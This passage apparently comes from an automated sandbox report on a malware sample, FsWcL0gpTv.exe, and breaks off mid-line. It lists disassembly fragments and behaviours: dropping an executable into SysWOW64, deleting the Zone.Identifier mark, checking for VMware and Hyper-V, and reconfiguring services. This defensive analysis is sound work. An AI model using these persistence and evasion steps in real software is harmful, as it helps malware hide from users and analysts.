                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h0_2_02E779AF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h0_2_02E7798F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh0_2_02E7795F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h0_2_02E7792F
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A75EA0 push ecx; mov dword ptr [esp], 0000A3FDh3_2_02A75EA1
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A75D90 push ecx; mov dword ptr [esp], 0000B2E0h3_2_02A75D91
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A75DF0 push ecx; mov dword ptr [esp], 0000AAF5h3_2_02A75DF1
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A75EF0 push ecx; mov dword ptr [esp], 0000669Ch3_2_02A75EF1
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A75DC0 push ecx; mov dword ptr [esp], 000089FAh3_2_02A75DC1

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeExecutable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeExecutable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exePE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exePE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02EF5070
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02EF5070
                Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_02EF38F0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_02EF38F0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_02A738F0
                Source: svchost.exe, 00000004.00000002.501755488.0000017996C64000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000004.00000002.500177833.000001799182A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`s
                Source: svchost.exe, 00000001.00000002.494050614.0000020E88002000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.501721455.0000017996C57000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000007.00000002.500021852.0000027766466000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.500101123.0000021FB9C29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.0000<